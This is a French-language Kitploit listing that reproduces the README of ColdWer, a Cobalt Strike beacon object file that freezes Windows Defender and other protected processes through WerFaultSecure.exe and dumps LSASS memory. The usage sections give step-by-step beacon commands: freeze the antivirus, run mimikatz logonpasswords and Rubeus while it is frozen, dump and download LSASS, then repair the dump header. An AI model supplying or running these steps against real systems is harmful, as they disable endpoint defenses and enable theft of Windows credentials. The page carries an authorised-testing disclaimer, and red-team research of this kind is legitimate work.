Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
ColdWer — BOF Cobalt Strike pour geler les processus EDR/AV et extraire LSASS en utilisant le contournement PPL de WerFaultSecure.exe | Kitploit
Outils/GitHubGitHub/0xsh3llf1r3/coldwer
Escalade de PrivilègesExploitationMouvement LatéralPost-ExploitationRed TeamingDéveloppement de Charges Utiles
GitHub0xsh3llf1r3/coldwer

ColdWer

BOF Cobalt Strike pour geler les processus EDR/AV et extraire LSASS en utilisant le contournement PPL de WerFaultSecure.exe

Voir le dépôt
144233il y a 7 moisVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

ColdWer
Une guerre froide sur votre endpoint.

Stars Forks License


🥶 ColdWer

ColdWer exploite le contournement PPL de WerFaultSecure.exe pour geler les processus EDR/AV et dump la mémoire LSASS sur les systèmes Windows modernes.

root@kitploit:~
C O L D W E R
        └─┴─┴── WerFaultSecure
    └─┴──────── LSASS Dump
└─┴──────────── Cold (Freeze)

Gelez votre EDR/AV. Extrayez ce dont vous avez besoin. Restez froid.


👤 Auteur

Sh3llf1r3 (@0xsh3llf1r3)


🙏 Crédits

Ce projet s'appuie sur les recherches de TwoSevenOneT (@TwoSevenOneT) :

ProjetDescription
EDR-FreezeTechnique originale de gel EDR
WSASSDump LSASS via WerFaultSecure

Tout le crédit pour les techniques sous-jacentes revient à TwoSevenOneT.


🔥 Fonctionnalités


🚀 Pour commencer

📋 Prérequis

  • Cobalt Strike 4.x
  • Beacon haute intégrité (Administrateur/SYSTEM)

💾 Installation

  1. Clonez le dépôt :
root@kitploit:~
git clone https://github.com/0xsh3llf1r3/ColdWer.git
  1. Chargez le script aggressor dans Cobalt Strike :
  • Allez dans Cobalt Strike → Script Manager
  • Cliquez sur Load
  • Sélectionnez cw/coldwer.cna

📦 Compilation depuis les sources

root@kitploit:~
# Naviguez vers le répertoire source
cd src/

# Compilez le BOF (nécessite MinGW)
make

# Ou manuellement :
x86_64-w64-mingw32-gcc -c coldwer.c -o ../cw/coldwer.o

📥 Téléchargement rapide

  1. Allez dans Releases
  2. Téléchargez coldwer.o et coldwer.cna
  3. Placez les deux dans le même dossier
  4. Chargez coldwer.cna dans Cobalt Strike

🖥️ Utilisation

❄️ Geler l'EDR/AV

root@kitploit:~
# Trouver le PID de Windows Defender
beacon> ps

# Geler le processus
beacon> cw-freeze 1337

# Exécutez vos commandes pendant que l'EDR/AV est gelé
beacon> mimikatz sekurlsa::logonpasswords
beacon> execute-assembly /tools/Rubeus.exe triage

# Dégeler une fois terminé
beacon> cw-unfreeze

🔓 Dumper LSASS

root@kitploit:~

# Étape 1 : Téléchargez le WerFaultSecure.exe de Win8.1
beacon> cd C:\Windows\Temp
beacon> upload /path/to/bin/wfs.exe

# Étape 2 : Trouvez le PID de LSASS
beacon> ps

# Étape 3 : Dump LSASS
beacon> cw-dump 314 C:\Windows\Temp\wfs.exe

# Étape 4 : Téléchargez le dump
beacon> download C:\Windows\Temp\lsass.dmp

🔧 Après le téléchargement

Modifiez l'en-tête du fichier pour restaurer le format minidump :

Original (PNG)Remplacer par (MDMP)
89 50 4E 474D 44 4D 50

Commandes de restauration de l'en-tête :

MéthodeCommande
Pythonopen('lsass.dmp','r+b').write(b'MDMP')
Bashprintf '\x4d\x44\x4d\x50' | dd of=lsass.dmp bs=1 count=4 conv=notrunc
PowerShell$f=[IO.File]::Open("lsass.dmp","Open","Write");$f.Write([byte[]](0x4D,0x44,0x4D,0x50),0,4);$f.Close()

Analysez ensuite avec Mimikatz :

root@kitploit:~
mimikatz# sekurlsa::minidump lsass.dmp
mimikatz# sekurlsa::logonpasswords

📋 Commandes

CommandeDescription
cw-freeze <PID> [Chemin]Geler un processus
cw-unfreezeDégeler le processus précédemment gelé
cw-dump <PID> <Chemin>Dumper la mémoire LSASS

📝 Exemples

root@kitploit:~
# Geler avec le chemin par défaut
beacon> cw-freeze 1337

# Utiliser un WerFaultSecure.exe personnalisé
beacon> cw-freeze 1337 C:\Windows\Temp\wfs.exe

# Dump LSASS
beacon> cw-dump 314 C:\Windows\Temp\wfs.exe

# Dégeler une fois terminé
beacon> cw-unfreeze

✅ Cibles supportées

CibleStatut
Windows Defender (MsMpEng.exe)✅ Fonctionne
LSASS (lsass.exe)✅ Fonctionne
Autres processus PPL✅ Fonctionne

⚠️ Limitations

Ne fonctionne PAS contre les EDR avec auto-protection en mode noyau :

EDRStatut
Elastic Endpoint❌ Bloqué
CrowdStrike Falcon❌ Bloqué
SentinelOne❌ Bloqué
Carbon Black❌ Bloqué

⚙️ Fonctionnement

root@kitploit:~
1. 🚀 Lancement de WerFaultSecure.exe en tant que PPL (niveau WinTcb)
                    ↓
2. 🎯 WerFaultSecure s'attache au processus cible
                    ↓
3. ⏸️  MiniDumpWriteDump suspend tous les threads cibles
                    ↓
4. 🥶 Suspendre WerFaultSecure lui-même → La cible reste gelée
                    ↓
5. ✅ Exécutez vos commandes (l'EDR/AV ne voit rien !)
                    ↓
6. 🔥 Terminer WerFaultSecure → La cible se dégèle

🔑 Pourquoi WerFaultSecure de Win8.1 ?

VersionSortie
Windows 10/11Dump chiffré uniquement
Windows 8.1Dump brut non chiffré

🔍 Dépannage


⚖️ Avertissement

root@kitploit:~
⚠️ POUR TESTS DE SÉCURITÉ AUTORISÉS UNIQUEMENT

Cet outil est destiné à :
- Des tests d'intrusion autorisés
- Des opérations Red Team avec autorisation écrite
- Des recherches en sécurité dans des environnements contrôlés

L'auteur n'est pas responsable de toute utilisation abusive ou des dommages causés par cet outil.
L'accès non autorisé à des systèmes informatiques est illégal.

📜 Licence

Licence MIT - Voir LICENSE


🥶 Restez froid. Restez silencieux. 🥶

⭐ Mettez une étoile à ce dépôt si vous le trouvez utile ! ⭐

Télécharger l’outil
FonctionnalitéDescription
❄️ GelerMet les processus EDR/AV en état de coma
🔓 DumperExtrait la mémoire LSASS en contournant PPL
🛡️ Contournement PPLExploite WerFaultSecure.exe au niveau WinTcb
⚡ RapideExécution BOF en ligne
🎯 Contrôle manuelVous décidez quand geler et dégeler
ErreurCauseSolution
Fichier introuvableChemin invalideVérifiez le chemin de WerFaultSecure.exe
Accès refuséFaibles privilègesExécutez en tant qu'Administrateur/SYSTEM
Signature invalideBinaire non signéUtilisez un WerFaultSecure.exe correctement signé
Le processus n'existe pasMauvais PIDVérifiez le PID avec la commande ps
Cible protégéeProtection noyauL'EDR a une auto-protection (non contournable)
Déjà geléÉtat bloquéLancez d'abord cw-unfreeze